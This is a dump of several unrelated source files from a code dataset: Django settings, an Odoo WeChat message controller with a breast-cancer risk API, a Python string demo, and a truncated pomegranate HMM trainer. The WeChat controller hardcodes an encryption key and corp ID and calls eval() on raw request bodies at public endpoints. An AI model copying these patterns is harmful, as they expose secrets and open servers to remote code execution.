\"http://media.lawrence.com/media/\", \"http://example.com/media/\"\nMEDIA_URL = '/media/'\nSTATIC_DOC_ROOT = 'home/site-directory/media/'\nADMIN_MEDIA_PREFIX = '/admin-media/'\n\nPIPELINE_COMPASS_ARGUMENTS = '-c %s' % project('static/config.rb')\nPIPELINE_COMPILERS = ('pipeline_compass.compass.CompassCompiler',)\nPIPELINE_CSS = {\n 'app': {\n 'source_filenames': (\n 'vendor/jqueryUI/css/smoothness/jquery-ui-1.10.0.custom.css',\n 'vendor/css/crumble.css',\n 'vendor/css/grumble.min.css',\n 'vendor/css/slideviewer.css',\n 'vendor/css/L.Control.Zoomslider.css',\n 'vendor/css/leaflet_numbered_markers.css',\n 'vendor/css/backgrid.css',\n 'vendor/css/backgrid-select2-cell.css',\n 'vendor/css/select2.css',\n 'sass/base.sass',\n ),\n 'output_filename': '.css/app.css',\n 'variant': 'datauri',\n },\n}\n\n# RequireJS options\nREQUIRE_BASE_URL = \"coffee/backbone\"\nREQUIRE_ENVIRONMENT = \"node\"\nREQUIRE_JS = \"components/requirejs/require.js\"\nREQUIRE_BUILD_PROFILE = \"../app.inventory.js\"\nREQUIRE_STANDALONE_MODULES = {\n \"main\": {\n \"out\": \"inventory-built.js\",\n \"build_profile\": \"../app.inventory.js\",\n }\n}\n\nSTATICFILES_DIRS = (\n project('static/'),\n project('tools/static/'),\n)\n\nSTATICFILES_FINDERS = (\n 'django.contrib.staticfiles.finders.FileSystemFinder',\n 'django.contrib.staticfiles.finders.AppDirectoriesFinder',\n # other finders..\n)\n\n# URL prefix for static files.\n# Example: \"http://media.lawrence.com/static/\"\nSTATIC_URL = '/static/'\n\n# URL prefix for s3 hosted files.\n# To use, {{S3HOST}}foo.bar make sure there is no trailing slash after S3HOST\nS3HOST = 'https://s3.amazonaws.com/whwnhaiti/'\n\n# URL prefix for admin static files -- CSS, JavaScript and images.\n# Make sure to use a trailing slash.\n# Examples: \"http://foo.com/static/admin/\", \"/static/admin/\".\nADMIN_MEDIA_PREFIX = '/static/admin/'\n\n# Fixtures for initial data\nFIXTURES_DIR = (\n project(\"fixtures/\"),\n)\n\n# List of callables that know how to import templates from various sources.\nTEMPLATE_LOADERS = (\n 'django.template.loaders.filesystem.Loader',\n 'django.template.loaders.app_directories.Loader',\n # 'django.template.loaders.eggs.Loader',\n)\n\nTEMPLATE_CONTEXT_PROCESSORS = (\n 'django.contrib.auth.context_processors.auth',\n 'django.core.context_processors.static',\n 'django.core.context_processors.request',\n 'django.core.context_processors.debug',\n 'django.contrib.messages.context_processors.messages'\n)\n\nINTERNAL_IPS = ('127.0.0.1', '10.0.2.2')\nMESSAGE_STORAGE = 'django.contrib.messages.storage.cookie.CookieStorage'\n\nMIDDLEWARE_CLASSES = (\n 'django.middleware.common.CommonMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n\n # Timeout Middleware is used to time out someones session after a specified period of time\n # 'middleware.timeoutmiddleware.TimeoutMiddleware',\n\n 'pipeline.middleware.MinifyHTMLMiddleware',\n 'debug_toolbar.middleware.DebugToolbarMiddleware', \n)\n\nROOT_URLCONF = 'urls'\n\nINSTALLED_APPS = (\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.gis',\n 'django.contrib.admin',\n 'django.contrib.staticfiles',\n 'django.contrib.messages',\n 'django_jenkins',\n 'haystack',\n 'adminplus',\n 'debug_toolbar',\n 'django_extensions',\n # in conjunction with django.contrib.staticfiles\n 'pipeline',\n 'whwn',\n 'whwn.templatetags',\n 'tools',\n 'registration',\n 'postmark',\n 'south',\n 'djcelery',\n 'tastypie',\n 'require',\n)\n\nDEBUG_TOOLBAR_PANELS = (\n 'debug_toolbar.panels.version.VersionDebugPanel',\n 'debug_toolbar.panels.timer.TimerDebugPanel',\n 'debug_toolbar.panels.settings_vars.SettingsVarsDebugPanel',\n 'debug_toolbar.panels.headers.HeaderDebugPanel',\n 'debug_toolbar.panels.request_vars.RequestVarsDebugPanel',\n 'debug_toolbar.panels.template.TemplateDebugPanel',\n 'debug_toolbar.panels.sql.SQLDebugPanel',\n 'debug_toolbar.panels.logger.LoggingPanel',\n)\n\ndef custom_show_toolbar(request):\n return True # Always show toolbar, for example purposes only.\n\nDEBUG_TOOLBAR_CONFIG = {\n 'INTERCEPT_REDIRECTS': False,\n 'SHOW_TOOLBAR_CALLBACK': None,\n 'EXTRA_SIGNALS': [],\n 'HIDE_DJANGO_SQL': False,\n 'SHOW_TEMPLATE_CONTEXT': True,\n 'TAG': 'body',\n}\n\nTEMPLATE_DIRS = (\n # Put strings here, like \"/home/html/django_templates\" or \"C:/www/django/templates\".\n # Always use forward slashes, even on Windows.\n # Don't forget to use absolute paths, not relative paths.\n project(\"templates/\"),\n project('tools/templates/'),\n)\n\n# A sample logging configuration. The only tangible logging\n# performed by this configuration is to send an email to\n# the site admins on every HTTP 500 error.\n# See http://docs.djangoproject.com/en/dev/topics/logging for\n# more details on how to customize your logging configuration.\nLOGGING = {\n 'version': 1,\n 'disable_existing_loggers': False,\n 'handlers': {\n 'console': {\n 'level': 'DEBUG',\n 'class': 'logging.StreamHandler',\n },\n },\n 'loggers': {\n 'django': {\n 'handlers': ['console'],\n 'level': 'ERROR',\n 'propagate': True,\n },\n 'django.request': {\n 'handlers': ['console'],\n 'level': 'ERROR',\n 'propagate': False,\n },\n # 'django.db.backends': {\n # 'level': 'DEBUG',\n # 'handlers': ['console'],\n # },\n }\n}\n\nTEST_RUNNER = 'whwn.testing.WhwnTestSuiteRunner'\n\nAUTH_PROFILE_MODULE = 'whwn.UserProfile'\n\nLOGIN_URL = '/accounts/login/'\n\nSESSION_EXPIRE_AT_BROWSER_CLOSE = True\n","sub_path":"app/settings/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":7003,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"551172177","text":"# -*- coding: utf-8 -*-\n\nfrom openerp import http\nimport hashlib\nfrom lxml import etree\nfrom openerp.http import request\nfrom openerp.modules.registry import RegistryManager\nfrom openerp import SUPERUSER_ID\nimport time\nimport random\nimport datetime,json\nfrom openerp.addons.rhwl import rhwl_sale,rhwl_sms\nfrom .. import WXBizMsgCrypt\nfrom urllib import unquote\nimport logging\nimport re\nimport BCPTConvert,BCPT\n_logger = logging.getLogger(__name__)\n\nclass weixin(http.Controller):\n CONTEXT={'lang': \"zh_CN\",'tz': \"Asia/Shanghai\"}\n HOSTNAME=\"http://erp.genetalks.com\"\n\n def xml2dict(self,xml):\n data = dict([(x.tag,x.text) for x in xml.getchildren()])\n return data\n\n def checkSignature(self,signature,timestamp,nonce,token):\n \"\"\"检查是否微信官方通信请求。\"\"\"\n #token = 'vnsoft'\n #字典序排序\n list=[token,timestamp,nonce]\n list.sort()\n #sha1加密算法\n sha1=hashlib.sha1()\n map(sha1.update,list)\n hashcode=sha1.hexdigest()\n\n #如果是来自微信的请求,则回复True,否则为False\n return hashcode == signature\n\n def msgProcess(self,msgdata,encrypt=False,kw=None):\n \"\"\"处理消息接口内容\"\"\"\n #获取官方POST过来的数据\n\n if msgdata:\n try:\n xml = etree.fromstring(msgdata)#进行XML解析\n msgType=xml.find(\"MsgType\").text\n #根据消息类型调用不同的方法处理\n _logger.debug(\"msg type is:\"+msgType)\n if msgType=='event':\n return self.eventProcess(xml,encrypt,kw)\n elif msgType=='text':\n _logger.debug(\"call textProcess\")\n return self.textProcess(xml,encrypt,kw)\n except:\n return msgdata\n return 'Not Data Found'\n\n def eventProcess(self,xmlstr,encrypt=False,kw=None):\n xml_data = self.xml2dict(xmlstr)\n msgType=xml_data.get(\"MsgType\")\n fromUser=xml_data.get(\"FromUserName\")\n toUser=xml_data.get(\"ToUserName\")\n Event=xml_data.get(\"Event\")#获得用户所输入的内容\n AgentID=xml_data.get(\"AgentID\",None)\n\n if Event=='subscribe':#关注\n registry = RegistryManager.get(request.session.db)\n with registry.cursor() as cr:\n orig = registry.get(\"rhwl.weixin.base\")\n welcome = orig.action_subscribe(cr,toUser,fromUser,AgentID)\n return self.replyWeiXin(fromUser,toUser,welcome,encrypt,AgentID,kw)\n #return self.replyWeiXin(fromUser,toUser,u\"欢迎关注【人和未来生物科技(北京)有限公司】,您可以通过输入送检编号查询检测进度和结果。\\n祝您生活愉快!\")\n elif Event==\"CLICK\" or Event==\"click\":\n key = xml_data.get(\"EventKey\")\n registry = RegistryManager.get(request.session.db)\n with registry.cursor() as cr:\n orig = registry.get(\"rhwl.weixin.base\")\n res=orig.action_event_clicked(cr,key,toUser,fromUser,AgentID)\n\n if isinstance(res,(list,tuple)):\n return self.send_photo_text(fromUser,toUser,res[0],res[1],encrypt,AgentID,kw)\n else:\n return self.replyWeiXin(fromUser,toUser,res,encrypt,AgentID,kw)\n elif Event==\"unsubscribe\":\n registry = RegistryManager.get(request.session.db)\n with registry.cursor() as cr:\n orig = registry.get(\"rhwl.weixin.base\")\n orig.action_unsubscribe(cr,toUser,fromUser,AgentID)\n return self.replyWeiXin(fromUser,toUser,u\"祝您生活愉快!\",encrypt,AgentID,kw)\n else:\n return \"\"\n\n def textProcess(self,xmlstr,encrypt=False,kw=None):\n\n msgType=xmlstr.find(\"MsgType\").text\n fromUser=xmlstr.find(\"FromUserName\").text\n toUser=xmlstr.find(\"ToUserName\").text\n content=xmlstr.find(\"Content\").text #获得用户所输���的内容\n AgentID_el = [x for x in xmlstr.getchildren() if x.tag==\"AgentID\"]\n if AgentID_el:\n AgentID = AgentID_el[0].text\n else:\n AgentID=None\n\n registry = RegistryManager.get(request.session.db)\n _logger.debug((fromUser,toUser,content,AgentID))\n if content==\"openid\":\n return self.replyWeiXin(fromUser,toUser,fromUser,encrypt,AgentID,kw)\n if content==\"buy\":\n articles=[\n {\n \"Title\":\"易感检测项目在线购买\",\n \"Description\":\"您可以选择以下易感检测项目支付\",\n \"PicUrl\":\"/rhwl_weixin/static/img/logo1.png\",\n },\n {\n \"Title\":\"肿瘤三项\",\n \"Description\":\"肿瘤三项易感基因检测\",\n \"PicUrl\":\"/rhwl_weixin/static/img/crm-2.jpg\",\n \"Url\":\"http://erp.genetalks.com/rhwl_weixin/static/buy/genes-3.html\"\n },\n ]\n return self.send_photo_text(fromUser,toUser,\"rhwc\",articles,encrypt,AgentID,kw)\n with registry.cursor() as cr:\n orig = registry.get(\"rhwl.weixin.base\")\n res = orig.action_text_input(cr,content,toUser,fromUser)\n _logger.debug((fromUser,toUser,res,encrypt,AgentID,kw))\n return self.replyWeiXin(fromUser,toUser,res,encrypt,AgentID,kw)\n\n\n def send_photo_text(self,toUser,fromUser,code,articles,encrypt=None,AgentID=None,kw=None):\n #发送图文消息\n registry = RegistryManager.get(request.session.db)\n with registry.cursor() as cr:\n orig = registry.get(\"rhwl.weixin\")\n #ids = orig.search(cr,SUPERUSER_ID,[(\"openid\",\"=\",toUser),(\"base_id.code\",\"=\",code)])\n\n #if ids:\n # user_obj = orig.browse(cr,SUPERUSER_ID,ids[0]).rhwlid\n # user_obj = user_obj.encode(\"utf-8\")\n #else:\n user_obj=toUser\n articlesxml=\"\"\n for i in articles:\n itemxml=\"\"\n\n for k,v in i.items():\n\n if k==\"Url\" or k==\"PicUrl\":\n if not v.startswith(\"http\"): v = self.HOSTNAME+v\n if k=='Url':\n if v.count('?')>0:\n v = v+\"&code=\"+code+\"&openid=\"+user_obj\n else:\n v = v+\"?code=\"+code+\"&openid=\"+user_obj\n\n itemxml +=\"<%s>\" %(k,v,k)\n itemxml=\"%s\" % (itemxml,)\n articlesxml += itemxml\n\n temp = \"%s%s%s \"\n temp = temp % (toUser,fromUser,time.time().__trunc__().__str__(),str(articles.__len__()),articlesxml)\n if encrypt:\n sVerifyTimeStamp=kw.get('timestamp')\n sVerifyNonce=kw.get('nonce')\n sToken = kw.get('t')\n sEncodingAESKey = \"KWkAnyk5COAu3tiLlSvWCwHp8pHj7wGwjYvuNxLdyCR\"\n sCorpID = \"wx77bc43a51cdb049b\"\n wxcpt=WXBizMsgCrypt.WXBizMsgCrypt(sToken,sEncodingAESKey,sCorpID)\n ret,sEncryptMsg=wxcpt.EncryptMsg(temp, sVerifyNonce, sVerifyTimeStamp)\n _logger.debug((ret,sEncryptMsg))\n if( ret!=0 ):\n return \"ERR: EncryptMsg ret: \" + ret\n return sEncryptMsg\n else:\n return temp\n\n def replyWeiXin(self,toUser,fromUser,text,encrypt=False,AgentID=None,kw=None):\n \"\"\"微信号统一回复方法\"\"\"\n #_logger.error((toUser,fromUser,text,encrypt,AgentID,kw))\n if not isinstance(text,(str,unicode)):\n _logger.debug(\"text is not str and unicode.\")\n _logger.debug(type(text))\n text = str(text)\n if AgentID:\n temp = \"%s\"+AgentID+\"\"\n temp = temp % (toUser,fromUser,time.time().__trunc__().__str__(),text.encode(\"utf-8\"))\n sVerifyTimeStamp=kw.get('timestamp')\n sVerifyNonce=kw.get('nonce')\n sToken = kw.get('t')\n sEncodingAESKey = \"KWkAnyk5COAu3tiLlSvWCwHp8pHj7wGwjYvuNxLdyCR\"\n sCorpID = \"wx77bc43a51cdb049b\"\n wxcpt=WXBizMsgCrypt.WXBizMsgCrypt(sToken,sEncodingAESKey,sCorpID)\n ret,sEncryptMsg=wxcpt.EncryptMsg(temp, sVerifyNonce, sVerifyTimeStamp)\n #_logger.error((ret,sEncryptMsg))\n if( ret!=0 ):\n return \"ERR: EncryptMsg ret: \" + ret\n return sEncryptMsg\n else:\n temp = \"%s\"\n _logger.debug(temp % (toUser,fromUser,time.time().__trunc__().__str__(),text))\n return temp % (toUser,fromUser,time.time().__trunc__().__str__(),text)\n\n def customer_service(self,toUser,fromUser,encrypt=False):\n \"\"\"微信号统一回复方法\"\"\"\n temp = \"%s\"\n return temp % (toUser,fromUser,time.time().__trunc__().__str__())\n\n @http.route(\"/web/api/risk_tool/\",type=\"http\",auth=\"none\")\n def rhwl_risk_tool(self,**kw):\n bcpt = BCPT.RiskCalculator()\n bcpt_convert = BCPTConvert.BcptConvert()\n\n currentAge = bcpt_convert.GetCurrentAge((kw.get(\"current_age\")).encode(\"utf-8\"))\n menarcheAge = bcpt_convert.GetMenarcheAge(kw.get(\"age_at_menarche\").encode(\"utf-8\"))\n firstLiveBirthAge = bcpt_convert.GetFirstLiveBirthAge(kw.get(\"age_at_first_live_birth\").encode(\"utf-8\"))\n firstDegreeRel = bcpt_convert.GetFirstDegRelatives(kw.get(\"related_with_breast_cancer\").encode(\"utf-8\"))\n hadBiopsy = bcpt_convert.GetEverHadBiopsy(kw.get(\"ever_had_biopsy\").encode(\"utf-8\"))\n numBiopsy = bcpt_convert.GetNumberOfBiopsy(kw.get(\"previous_biopsies\").encode(\"utf-8\"))\n hyperPlasia = bcpt_convert.GetHyperPlasia(kw.get(\"biopsy_with_hyperplasia\").encode(\"utf-8\"))\n race = bcpt_convert.GetRace(kw.get(\"race\").encode(\"utf-8\"))\n\n CurrentAge = bcpt_convert.GetCurrentAge(currentAge)\n MenarcheAge = bcpt_convert.MenarcheAge(menarcheAge)\n FirstLiveBirthAge =bcpt_convert.FirstLiveBirthAge(firstLiveBirthAge)\n EverHadBiopsy = bcpt_convert.EverHadBiopsy(hadBiopsy)\n NumberOfBiopsy = bcpt_convert.NumberOfBiopsy(numBiopsy, EverHadBiopsy)\n ihyp = bcpt_convert.Hyperplasia(race, EverHadBiopsy);\n race = int(bcpt_convert.GetRace(race))\n if (race < 7):\n FirstDegRelatives = bcpt_convert.FirstDegRelatives1(firstDegreeRel)\n else:\n FirstDegRelatives = bcpt_convert.FirstDegRelatives2(firstDegreeRel, race)\n\n ProjectionAge = CurrentAge+5\n AgeIndicator = bcpt_convert.CurrentAgeIndicator(CurrentAge)\n rhyp = bcpt_convert.RHyperplasia(ihyp,EverHadBiopsy)\n irace = race\n\n abs_risk5 = bcpt.CalculateAbsoluteRisk(CurrentAge,ProjectionAge,AgeIndicator,NumberOfBiopsy,MenarcheAge,FirstLiveBirthAge,FirstDegRelatives,EverHadBiopsy,ihyp,rhyp,irace)\n avg_risk5 = bcpt.CalculateAeverageRisk(CurrentAge,ProjectionAge,AgeIndicator,NumberOfBiopsy,MenarcheAge,FirstLiveBirthAge,FirstDegRelatives,EverHadBiopsy,ihyp,rhyp,irace)\n abs_risk90 = bcpt.CalculateAbsoluteRisk(CurrentAge,90,AgeIndicator,NumberOfBiopsy,MenarcheAge,FirstLiveBirthAge,FirstDegRelatives,EverHadBiopsy,ihyp,rhyp,irace)\n avg_risk90 = bcpt.CalculateAeverageRisk(CurrentAge,90,AgeIndicator,NumberOfBiopsy,MenarcheAge,FirstLiveBirthAge,FirstDegRelatives,EverHadBiopsy,ihyp,rhyp,irace)\n abs_risk5 = round(round(abs_risk5,6)*100,1)\n avg_risk5 = round(round(avg_risk5,6)*100,1)\n abs_risk90 = round(round(abs_risk90,6)*100,1)\n avg_risk90 = round(round(avg_risk90,6)*100,1)\n response = request.make_response(json.dumps([abs_risk5,avg_risk5,abs_risk90,avg_risk90],ensure_ascii=False), [('Content-Type', 'application/json')])\n return response.make_conditional(request.httprequest)\n\n @http.route(\"/web/weixin/\",type=\"http\",auth=\"none\")\n def rhwl_weixin(self,**kw):\n if kw.get('signature') and kw.get('timestamp') and kw.get('nonce'):#微信官网是否有转入验证信息\n if self.checkSignature(kw.get('signature'),kw.get('timestamp'),kw.get('nonce'),kw.get('t')):\n if kw.get('echostr'):#验证通过则返回传入的echostr\n return kw.get('echostr')\n else:\n return 'Signature Error.'\n elif kw.get('msg_signature') and kw.get('timestamp') and kw.get('nonce'):\n #加密消息判断\n sToken = kw.get('t')\n sEncodingAESKey = \"KWkAnyk5COAu3tiLlSvWCwHp8pHj7wGwjYvuNxLdyCR\"\n sCorpID = \"wx77bc43a51cdb049b\"\n wxcpt=WXBizMsgCrypt.WXBizMsgCrypt(sToken,sEncodingAESKey,sCorpID)\n sVerifyMsgSig=kw.get('msg_signature')\n sVerifyTimeStamp=kw.get('timestamp')\n sVerifyNonce=kw.get('nonce')\n sVerifyEchoStr=kw.get('echostr')\n if sVerifyEchoStr:\n ret,sEchoStr=wxcpt.VerifyURL(sVerifyMsgSig, sVerifyTimeStamp,sVerifyNonce,unquote(sVerifyEchoStr))\n if(ret!=0):\n return \"ERR: VerifyURL ret: \" + ret\n else:\n return sEchoStr\n else:\n sReqData = request.httprequest.data\n ret,sMsg=wxcpt.DecryptMsg( sReqData, sVerifyMsgSig, sVerifyTimeStamp, sVerifyNonce)\n _logger.debug((ret,sMsg))\n if( ret!=0 ):\n return \"ERR: DecryptMsg ret: \" + ret\n else:\n return self.msgProcess(sMsg,True,kw)\n return self.msgProcess(request.httprequest.data,False,kw)\n\n @http.route(\"/web/weixin/bind/\",type=\"http\",auth=\"public\")\n def rhwl_weixin_bind(self,**kw):\n para={}\n if request.httprequest.data:\n para = eval(request.httprequest.data)\n if kw:\n para.update(kw)\n if para.get(\"openid\") and para.get(\"uid\"):\n registry = RegistryManager.get(request.session.db)\n with registry.cursor() as cr:\n obj = registry.get(\"rhwl.weixin\")\n obj.action_user_bind(cr,para.get(\"code\"),para.get(\"openid\"),para.get(\"uid\"))\n response = request.make_response(json.dumps({\"statu\":200},ensure_ascii=False), [('Content-Type', 'application/json')])\n else:\n response = request.make_response(json.dumps({\"statu\":500},ensure_ascii=False), [('Content-Type', 'application/json')])\n return response.make_conditional(request.httprequest)\n\n @http.route(\"/web/weixin/jsapi/\",type=\"http\",auth=\"public\")\n def rhwl_weixin_jsapi(self,**kw):\n para={}\n if request.httprequest.data:\n para = eval(request.httprequest.data)\n if kw:\n para.update(kw)\n url=para.get(\"url\",\"\").encode('utf-8')\n code=para.get(\"code\",\"\").encode('utf-8')\n s='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'\n noncestr=''.join([s[random.randrange(0,s.__len__()-1)] for i in range(1,21)])\n timestamp=time.time().__trunc__().__str__()\n\n registry = RegistryManager.get(request.session.db)\n with registry.cursor() as cr:\n b = registry.get('rhwl.weixin.base')\n ids =b.search(cr,SUPERUSER_ID,[(\"code\",\"=\",code)],limit=1)\n appid = b.browse(cr,SUPERUSER_ID,ids).original_id\n jsapi_ticket= b._get_ticket(cr,SUPERUSER_ID,code,context=self.CONTEXT)\n str = \"jsapi_ticket=\"+jsapi_ticket+\"&noncestr=\"+noncestr+\"×tamp=\"+timestamp+\"&url=\"+url\n sha = hashlib.sha1(str)\n s = sha.hexdigest()\n data={\n \"noncestr\":noncestr,\n \"timestamp\":timestamp,\n \"signature\":s,\n \"appid\":appid\n }\n response = request.make_response(json.dumps(data,ensure_ascii=False), [('Content-Type', 'application/json')])\n return response.make_conditional(request.httprequest)","sub_path":"data/odoo/8.0/rhwl_weixin/controllers/weixin.py","file_name":"weixin.py","file_ext":"py","file_size_in_byte":16589,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"596575884","text":"# encoding: utf-8\n# from https://github.com/playone/forpython/blob/master/Newbie/test5.py\n\"\"\"\n字串可用 \" 或者 ' 做區隔\n同時字串也是利用陣列的概念作存取\n\"\"\"\n\ns = \"hello\"\ns += 'world'\ns1 = s.replace('l', \"1\")\ns2 = s[0]+\"i\"\n\nprint(s, s1, s2)\n\n\"\"\"\n內建的字串分割函式 spilt非常好用,可以將字串依指定字元做切割\n\"\"\"\n\ns3 = 'I have a pen'\ns3_split=s3.split(' ')\n\nprint(s3_split)\nprint(s3_split[2])","sub_path":"practice01/test_aiyo08.py","file_name":"test_aiyo08.py","file_ext":"py","file_size_in_byte":440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"561821831","text":"from pomegranate import HiddenMarkovModel, GeneralMixtureModel, MultivariateGaussianDistribution, NormalDistribution, Kmeans\nfrom pomegranate.utils import is_gpu_enabled, disable_gpu, enable_gpu\nfrom pomegranate.callbacks import LambdaCallback, Callback\nfrom pomegranate.io import BaseGenerator, SequenceGenerator\n# from pomegranate.base import State\nimport numpy as np\nfrom ticktock import tick, tock\n\nfrom hmm_train_base import HMMTrainerBase, HMMInfo\n\nclass ModelCheckpoint(Callback):\n \"\"\"This will save the model to disk after each epoch.\"\"\"\n\n def __init__(self, name=None, verbose=True, n=1):\n self.model = None\n self.params = None\n self.name = None\n self.verbose = verbose\n self.n = n\n self.endsCounter = 0\n\n def on_epoch_end(self, logs):\n \"\"\"Save the model to disk at the end of each n epoch.\"\"\"\n\n self.endsCounter += 1\n if(self.endsCounter % self.n == 0):\n self._save(logs)\n self.endsCounter = 0\n\n def _save(self, logs):\n \"\"\"Save the model to disk at the end of each epoch.\"\"\"\n\n model = self.model.to_json()\n epoch = logs['epoch']\n name = self.name if self.name is not None else self.model.name\n\n if self.verbose:\n print(\"[{}] Saving checkpoint to {}.{}.json\".format(epoch, name, epoch))\n\n with open('{}.{}.json'.format(name, epoch), 'w') as outfile:\n outfile.write(model)\n\n def on_training_end(self, logs):\n self._save(logs)\n\ndef randMVG(n=40):\n '''\n generates random multivariate gaussian\n '''\n means = np.random.randn(n)\n # covs = np.random.rand(n, n)\n covs = np.eye(n, n)\n # print(covs)\n return MultivariateGaussianDistribution(means, covs)\n\ndef randMVGMM(n=40, nmix=5, dist=MultivariateGaussianDistribution):\n '''\n generate random gaussian mixture model of multivariate distribution\n '''\n dists = [randMVG(n=n) for _ in range(nmix)]\n return GeneralMixtureModel(dists)\n\ndef randGaussian(n=40):\n '''\n generates random normal distribution\n '''\n return NormalDistribution(np.random.randint(1, 10), 1)\n\nclass PomegranateTrainer(HMMTrainerBase):\n trainerscount = 0\n def __init__(self, gpu=False, name=None, distName=\"G\", statesNumber=3, maxIters=1000, ltr=True, nmix=5):\n '''\n ltr: is left-to-right hmm model, default to true\n '''\n super().__init__(name=\"PomegranateHMM\", statesNumber=statesNumber, maxIters=maxIters, ltr=True)\n self.mname = name or f\"PomegranateTrainer{PomegranateTrainer.trainerscount}\"\n self.nmix = nmix\n self.statesNumber = statesNumber\n self.distName= distName\n self.maxIters = maxIters\n self.ltr = ltr\n self.gpu = gpu\n\n if (distName not in [\"G\", \"GMM\"]):\n raise TypeError(f\"{distName} is not a correct dist name or not yet implemented\")\n PomegranateTrainer.trainerscount += 1\n if(not self.gpu):\n disable_gpu()\n pass\n # print(\"is gpu enabled:\", is_gpu_enabled())\n\n def train(self, data, lens, threads=1):\n '''\n data: observed data.\n '''\n if(threads != 1): raise RuntimeError(\"threads option is disabled due to low perf.\")\n self._buildModel(data)\n print(\"model builded\")\n data = self._reshapeFeatures(data, lens)\n epochEndMessage = \"{}: [{}] improvement {}\"\n self.model.fit(data, \n callbacks=[ModelCheckpoint(n=5), LambdaCallback(on_epoch_end=lambda info: print(epochEndMessage.format(self.model.name, info['epoch'], info['improvement'])))],\n # n_jobs=threads,\n # algorithm=\"viterbi\",\n min_iterations=2,\n # lr_decay=-0.5, # default is 0\n verbose=True,\n stop_threshold=5e-7\n # debug=False\n )\n return self # same here, we return the self(HMMTrainer) for chaining\n\n def getScore(self, testData):\n return self.model.score(testData)\n\n def save(self, fileLocation):\n modelAsJson = self.model.to_json()\n with open(fileLocation, 'w') as saveFile:\n saveFile.write(modelAsJson)\n return fileLocation\n return None\n\n @staticmethod\n def load(fileLocation):\n with open(fileLocation) as modelFile:\n model = HiddenMarkovModel.from_json(modelFile.read())\n return model\n raise RuntimeError(\"can't load the model\")\n\n @staticmethod\n def info(model):\n if(not isinstance(model, HiddenMarkovModel)):\n raise TypeError(\"model should be of type pomegranate.HiddenMarkovModel explicitly\")\n return HMMInfo(model.name, model.dense_transition_matrix())\n \n\n def _buildModel(self, data):\n '''\n builds the model given the data to init the distributions at good point\n data: 2d matrix every row is a vector of features\n '''\n # we want to call from_matrix(transition, dists, starts, ends)\n tm = np.zeros((self.statesNumber, self.statesNumber))\n indices = [(x,x) for x in range(self.statesNumber)]\n indices.extend( [(x,x + 1) for x in range(self.statesNumber)] )\n indices.pop() # this the item (self.statesNumber-1 , self.statesNumber) that is out of bound\n indices = np.array(indices)\n tm[indices[:, 0], indices[:, 1]] = 0.5\n tm[self.statesNumber-1, self.statesNumber-1] = 0.5 # this is the end state prob, i write it alone as we may change it specificity\n\n dists = self._initDists(data)\n\n starts = np.zeros((self.statesNumber,))\n starts[0] = 1\n\n ends = np.zeros((self.statesNumber,))\n ends[-1] = 0.5\n\n self.model = HiddenMarkovModel.from_matrix(tm, dists, starts, ends, name=self.mname)\n \n return self.model\n \n def _initDists(self, X, distribution=MultivariateGaussianDistribution):\n technique = \"R_MV-GMM\" # mixture of multivariate gaussain distribution\n if (technique == \"GMM\"):\n # gaussian mixture model\n #// uvgd = NormalDistribution.from_samples(X)\n #// gmm = GeneralMixtureModel([uvgd.copy() for _ in range(self.nmix)])\n gmm = GeneralMixtureModel.from_samples(distributions=[NormalDistribution for _ in range(self.nmix)], X=X)\n dists = [gmm.copy() for _ in range(self.statesNumber)]\n elif(technique == \"MV-GMM\"):\n # multivariate gaussian mixture model\n #// mvgd = MultivariateGaussianDistribution.from_samples(X)\n #// gmm = GeneralMixtureModel([mvgd.copy() for _ in range(self.nmix)])\n gmm = GeneralMixtureModel.from_samples(distributions=[MultivariateGaussianDistribution for _ in range(self.nmix)], X=X, n_components=3)\n dists = [gmm.copy() for _ in range(self.statesNumber)]\n elif(technique == \"MVG\"):\n self._initkmeans(X=X, numClasses=self.statesNumber)\n dists = [MultivariateGaussianDistribution.from_samples(X=X[y==i]) for i in range(self.statesNumber)]\n elif(technique == \"R_GMM\"):\n # random gaussian mixture model\n randNormal = lambda: NormalDistribution(np.random.randint(1, 10), 1)\n randGMM = lambda: GeneralMixtureModel([randNormal() for _ in range(self.nmix)])\n dists = [randGMM() for _ in range(self.statesNumber)]\n elif(technique == \"R_MV-GMM\"):\n # random multivariate gaussian mixture model\n randGMM = lambda: GeneralMixtureModel([randMVG() for _ in range(self.nmix)])\n dists = [randGMM() for _ in range(self.statesNumber)]\n return dists\n\n #* not completed:\n #! GMM-HMM-k\n y = self._initkmeans(X, self.statesNumber)\n # list(map(print, y))\n return [GeneralMixtureModel.from_samples(distribution, X=X[y==i], n_components=self.nmix) for i in range(self.statesNumber)]\n\n\n #! Kmeans init\n if not isinstance(X, BaseGenerator):\n data_generator = SequenceGenerator(X, None, None)\n else:\n data_generator = X\n\n initialization_batch_size = len(data_generator)\n\n X_ = []\n data = data_generator.batches()\n for i in range(initialization_batch_size):\n batch = next(data)\n X_.extend(batch[0])\n\n X_concat = np.concatenate(X_)\n if X_concat.ndim == 1:\n X_concat = X_concat.reshape(X_concat.shape[0], 1)\n n, d = X_concat.shape\n clf = Kmeans(self.statesNumber, init=\"kmeans++\", n_init=1) # init should be one of\n clf.fit(X_concat, max_iterations=None, batches_per_epoch=None)\n y = clf.predict(X_concat)\n if callable(distribution):\n if d == 1:\n dists = [distribution.from_samples(X_concat[y == i][:,0]) \n for i in range(self.statesNumber)]\n elif distribution.blank().d > 1:\n dists = [distribution.from_samples(X_concat[y == i]) \n for i in range(self.statesNumber)]\n else:\n print(\"error\")\n return dists\n\n def _initkmeans(self, X, numClasses):\n clf = Kmeans(numClasses, init=\"kmeans++\", n_init=1) # init should be one of\n clf.fit(X, max_iterations=1, batches_per_epoch=None)\n y = clf.predict(X)\n # return GeneralMixtureModel([MultivariateGaussianDistribution.from_samples(X[y == i]) for i in range(self.nmix)])\n return y\n def _reshapeFeatures(self, origData, lens):\n # TODO: consider memory enhancements at copying\n lens = np.cumsum(lens)\n lens = 